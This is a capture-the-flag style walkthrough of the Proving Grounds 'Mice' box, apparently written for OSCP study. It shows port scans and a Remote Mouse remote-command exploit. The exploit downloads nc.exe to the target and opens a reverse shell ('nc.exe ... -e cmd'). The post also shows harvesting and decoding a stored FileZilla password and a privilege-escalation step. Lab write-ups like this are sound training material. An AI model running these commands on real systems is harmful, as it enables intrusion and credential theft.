Post cover image

June 23, 2026

Mice | Proving Grounds | OSCP Preparation

Box: Mice Community Rating: Hard

By SilentExploit

7 min read

I start off by running nmap and rustscan to enumerate open ports:

┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:06 +0100
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.50s elapsed
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.165.199 [65535 ports]
Discovered open port 3389/tcp on 192.168.165.199
Discovered open port 1980/tcp on 192.168.165.199
SYN Stealth Scan Timing: About 42.66% done; ETC: 23:08 (0:00:42 remaining)
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1978/tcp on 192.168.165.199
Discovered open port 7680/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:08, 87.29s elapsed (65535 total ports)
Nmap scan report for 192.168.165.199
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
1978/tcp open  unisql
1979/tcp open  unisql-java
1980/tcp open  pearldoc-xact
3389/tcp open  ms-wbt-server
7680/tcp open  pando-pub

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds
           Raw packets sent: 196661 (8.653MB) | Rcvd: 84 (3.717KB)
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:08 +0100
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:08
Completed Parallel DNS resolution of 1 host. at 23:08, 0.50s elapsed
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.165.199 [1000 ports]
Discovered open port 3389/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:08, 4.64s elapsed (1000 total ports)
Initiating Service scan at 23:08
Scanning 1 service on 192.168.165.199
Completed Service scan at 23:08, 6.22s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.165.199.
Initiating NSE at 23:08
Completed NSE at 23:08, 5.04s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.13s elapsed
Initiating NSE at 23:08
Completed NSE at 23:08, 0.00s elapsed
Nmap scan report for 192.168.165.199
Host is up (0.025s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-23T22:08:43+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Issuer: commonName=Remote-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-22T22:06:05
| Not valid after:  2026-12-22T22:06:05
| MD5:     f203 2fd3 4d93 a633 dbb5 2ebe 14ed c029
| SHA-1:   3088 8831 6a77 1f85 efb1 9c69 56d4 dbf8 d21a deae
|_SHA-256: 4abf c2af a191 7ed5 cb4b 6243 e787 51b5 25b9 7d31 813c 1dab 2678 d048 4344 bff1
| rdp-ntlm-info:
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2026-06-23T22:08:38+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<SNIP>

┌──(root㉿user)-[/home/user/CVE-2026-5027]
└─# rustscan -a $target
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.165.199:1979
Open 192.168.165.199:1978
Open 192.168.165.199:1980
Open 192.168.165.199:3389
Open 192.168.165.199:7680
[~] Starting Script(s)
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:10 +0100
Initiating Ping Scan at 23:10
Scanning 192.168.165.199 [4 ports]
Completed Ping Scan at 23:10, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:10
Completed Parallel DNS resolution of 1 host. at 23:10, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:10
Scanning 192.168.165.199 [5 ports]
Discovered open port 3389/tcp on 192.168.165.199
Discovered open port 1979/tcp on 192.168.165.199
Discovered open port 1978/tcp on 192.168.165.199
Discovered open port 1980/tcp on 192.168.165.199
Completed SYN Stealth Scan at 23:10, 1.22s elapsed (5 total ports)
Nmap scan report for 192.168.165.199
Host is up, received echo-reply ttl 125 (0.043s latency).
Scanned at 2026-06-23 23:10:29 BST for 1s

PORT     STATE    SERVICE       REASON
1978/tcp open     unisql        syn-ack ttl 125
1979/tcp open     unisql-java   syn-ack ttl 125
1980/tcp open     pearldoc-xact syn-ack ttl 125
3389/tcp open     ms-wbt-server syn-ack ttl 125
7680/tcp filtered pando-pub     no-response

These are some interesting results. None of the traditional points of entry (webservers, SMB etc.) are available. We have RDP but without credentials it doesn't really make sense trying to brute force our way in.

I then went through and used nmap to start pinpointing the 'exact' services running on the target. Port 1978 confirmed that we have Remote Mouse.

┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# nmap -sVC $target -p 1978
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 23:11 +0100
Nmap scan report for 192.168.165.199
Host is up (0.020s latency).

PORT     STATE SERVICE     VERSION
1978/tcp open  remotemouse Emote Remote Mouse

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.07 seconds

This is a companion app that turns your smartphone or tablet into a wireless mouse, keyboard, and trackpad for your Windows PC.

I was unable to find the exact version running on the target from my port based enumeration but luckily; the searchsploit results are narrow.

┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# searchsploit 'Remote Mouse'
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
<SNIP>

Remote Mouse 4.002 - Unquoted Service Path                                | windows/local/50258.txt
Remote Mouse GUI 3.008 - Local Privilege Escalation                       | windows/local/50047.txt
RemoteMouse 3.008 - Arbitrary Remote Command Execution                    | windows/remote/46697.py

The only applicable exploit for us (right now) which is RemoteMouse 3.008 — Arbitrary Remote Command Execution. I.e. we don't have local access so we can't escalate privileges nor can we utilize unquoted service paths so the other two can be discounted.

I initially tested whether we had successful command execution via ping i.e. we don't have any visible results from this exploit on our machine so if we get a response on tcpdump — we know that we have code execution on the target.

┌──(root㉿user)-[/run/…/2024/HTBox/mic/Wifi-Mouse-1.7.8.5]
└─# python2 exploit2.py 192.168.228.199 192.168.45.205 'cmd /c ping 192.168.45.205'
[+] 3..2..1..
[+] *Super fast hacker typing*

┌──(root㉿user)-[/home/user]
└─# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:42:50.572094 IP 192.168.45.205.33312 > 192.168.228.199.1978: Flags [S], seq 2902119491, win 64240, options [mss 1460,sackOK,TS val 230446086 ecr 0,nop,wscale 10], length 0
14:42:50.594102 IP 192.168.228.199.1978 > 192.168.45.205.33312: Flags [S.], seq 2645223207, ack 2902119492, win 65535, options [mss 1400,nop,wscale 8,nop,nop,sackOK], length 0

Whenever you are in this position on a Windows box you have the following options:

a) download a msfvenom executable onto the target and execute it b) use powershell's IEX module (not available here) c) transfer a copy of a netcat binary (shipped with Kali by default) onto the target and use that to send a shell back to the listener

┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# python3 exploit4.py --target-ip $target --cmd "powershell wget http://192.168.45.208/nc.exe -OutFile C:\Windows\Temp\nc.exe"

┌──(root㉿user)-[/usr/share/windows-resources/binaries]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.242.199 - - [01/May/2026 01:23:28] "GET /nc.exe HTTP/1.1" 200 -

┌──(root㉿user)-[/run/…/user/2024/HTBox/mice]
└─# python3 exploit4.py --target-ip $target --cmd 'powershell -c "C:/Windows/Temp/nc.exe 192.168.45.208 80 -e cmd"'

┌──(root㉿user)-[/usr/share/windows-resources/binaries]
└─# rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.242.199] 49907
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32\WindowsPowerShell\v1.0>

Privilege Escalation

At this point, you have a shell as the user divine but you don't have the plain text password to initiate a RDP session. There were some nuggets scattered around i.e. the NTLM hash was stored on the machine and visible in linpeas BUT it doesn't crack using any wordlists.

����������͹ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    divine::REMOTE-PC:1122334455667788:c37a12371f97c504147121e6d9a0cef3:01010000000000002711963cdde3dc018c39fd6e4260b4fb0000000008003000300000000000000000000000002000008efd1efe97fc0387bbb7cbb93e1c64202dec43df88870764b7699ef801869f470a00100000000000000000000000000000000000090000000000000000000000

Perusing Program Files we can see that we have FileZilla installed on the target.

None 
PS C:\Program Files\FileZilla FTP Client> dir "C:\Users\divine\AppData\Roaming\FileZilla\"
dir "C:\Users\divine\AppData\Roaming\FileZilla\"

    Directory: C:\Users\divine\AppData\Roaming\FileZilla

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         12/6/2021   8:40 PM          18963 filezilla.xml
-a----         12/6/2021   8:40 PM            451 layout.xml
-a----         12/6/2021   8:40 PM          28672 queue.sqlite3
-a----         12/6/2021   8:40 PM            458 recentservers.xml

PS C:\Program Files\FileZilla FTP Client> type "C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml"
type "C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml"
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
 <RecentServers>
  <Server>
   <Host>ftp.pg</Host>
   <Port>21</Port>
   <Protocol>0</Protocol>
   <Type>0</Type>
   <User>divine</User>
   <Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
   <Logontype>1</Logontype>
   <PasvMode>MODE_DEFAULT</PasvMode>
   <EncodingType>Auto</EncodingType>
   <BypassProxy>0</BypassProxy>
  </Server>
 </RecentServers>
</FileZilla3>

┌──(root㉿user)-[/home/user]
└─# echo "Q29udHJvbEZyZWFrMTE=" | base64 -d
ControlFreak11

As you can see, once decoded in base64 the password string for divine is ControlFreak11.

┌──(root㉿user)-[/home/user]
└─# xfreerdp3 /v:192.168.227.199 /u:divine /p:'ControlFreak11' /cert:ignore /dynamic-resolution /drive:tools,/run/media/user/2024/HTBox/tools

Now, in the RDP session — look at what applications are sitting on the desktop. On a number of boxes (and exams) I have done now it has been the case that the vector for local privilege escalation is listed on the desktop of the target.

None

If you remember our searchsploit results earlier; we had a local privilege escalation exploit for Remote Mouse 3.008.

You can confirm the version number by checking the properties of the application in Program Files.

None

Now that we have confirmed the local privilege escalation exploit applies to our exact version; we can follow the instructions in the above link.

I won't go through every step but I will highlight the pertinent points as the guidance is very brief.

You will need to select Remote Mouse via the system tray (you're not the administrator so you can't run the application directly).

None

In order to spawn the shell just click the Refresh button (sometimes called the Update or Reload button).

None

A new instance of command prompt will pop up as administrator:

None